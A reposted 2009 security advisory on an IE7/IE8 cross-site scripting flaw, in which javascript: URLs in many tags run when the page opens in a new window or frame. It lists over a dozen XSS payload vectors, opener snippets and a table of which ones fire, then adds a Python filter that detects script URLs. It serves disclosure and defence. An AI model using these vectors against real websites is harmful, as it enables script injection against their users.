Multiple Exploiting IE8/IE7 XSS Vulnerability 's

Posted by admin on 2017-05-03 02:32:03

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt

Overview:

Tags [not including <IFRAME>] in IE7/8 are not allowed to run "javascript:[jscodz]", but
we found that they are allowed to run when the page is opened in a new target.

For example, this URL:

http://www.80vul.com/test/ie8-1.htm

ie8-1.htm's codz:

<STYLE>@import 'javascript:alert("xss1")';</STYLE>
<IMG SRC=javascript:alert('XSS2')>
<BODY BACKGROUND="javascript:alert('XSS3')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS4');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">
<IFRAME SRC="javascript:alert('XSS6');"></IFRAME>
<DIV STYLE="background-image: url(javascript:alert('XSS7'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<script SRC="javascript:alert('xss11');"></script>
<video SRC="javascript:alert('xss12');"</video>
<LAYER SRC="javascript:alert('xss13')"></LAYER>
<embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>
<applet src="javascript:alert('xss15')" type=text/html>

When this URL is visited with IE7/8, <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> runs, but the others do not.
But what happens when ie8-1.htm is opened in a new target [like <a href= target="_blank">, <iframe>, window.open in <script>, etc.]? I tested this codz on my localhost:

<a href="http://www.80vul.com/test/ie8-1.htm" target="_blank">go</a>

[PS: <a href="http://www.80vul.com/test/ie8-1.htm">go</a> doesn't work]

and of course this codz:

<iframe src="http://www.80vul.com/test/ie8s.htm"></iframe>

and this codz:

<script>window.open("http://www.80vul.com/test/ie8-1.htm");</script>

……..[testing]…….

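So the results are:
---------------------------------------------------------
IE  | alert
---------------------------------------------------------
ie7 | xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9
---------------------------------------------------------
ie8 | xss4/xss1/xss11/xss6
---------------------------------------------------------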
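
Because the vectors in the results fire once the page is opened in a new target, a filter cannot rely on IE7/8 ignoring javascript: URLs outside <IFRAME>. The following server-side check is an added example, not code from the original advisory: it parses markup with Python's html.parser and reports each attribute or CSS value that resolves to a javascript: or vbscript: URL. The function names, the attribute list and the sample input are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

URL_ATTRS = {"src", "href", "background", "data", "action", "value"}  # assumed list
_PAD = re.compile(r"[\x00-\x20]+")  # whitespace and control characters
_CSS_SCRIPT = re.compile(r"(?:url\(|@import)['\"]?(?:javascript|vbscript):")

def is_script_url(value):
    v = _PAD.sub("", value or "").lower()  # " Java\tScript:" -> "javascript:"
    return v.startswith(("javascript:", "vbscript:"))

def css_has_script_url(css):
    return bool(_CSS_SCRIPT.search(_PAD.sub("", css or "").lower()))

class ScriptUrlFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []  # (tag, location) pairs in document order
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        self._in_style = tag == "style"
        for name, value in attrs:
            if name == "style":  # inline CSS
                bad = css_has_script_url(value)
            elif (tag, name) == ("meta", "content"):  # refresh target after "url="
                target = _PAD.sub("", value or "").lower().partition("url=")[2]
                bad = is_script_url(target)
            else:  # plain URL attributes, plus <param value=...>
                bad = name in URL_ATTRS and is_script_url(value)
            if bad:
                self.hits.append((tag, name))

    def handle_endtag(self, tag):
        self._in_style = False  # inside <style> only </style> is parsed as a tag

    def handle_data(self, data):
        if self._in_style and css_has_script_url(data):
            self.hits.append(("style", "css"))

def find_script_urls(markup):
    finder = ScriptUrlFinder()
    finder.feed(markup)
    finder.close()
    return finder.hits

SAMPLE = """<STYLE>@import 'javascript:alert("xss1")';</STYLE>
<IMG SRC=javascript:alert('XSS2')>
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">
<DIV STYLE="background-image: url(javascript:alert('XSS7'))"></DIV>"""  # constructed
```

Listing "value" in URL_ATTRS is deliberately conservative: it covers <param value=...> but will also flag other tags whose value attribute begins with a script scheme.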

Disclosure Timeline:

2009/05/01 – Found this Vulnerability
2009/06/22 – Public Disclosure

Greeting:

ycosxhack [http://hi.baidu.com/ycosxhack], Not his test, not this Vulnerability.
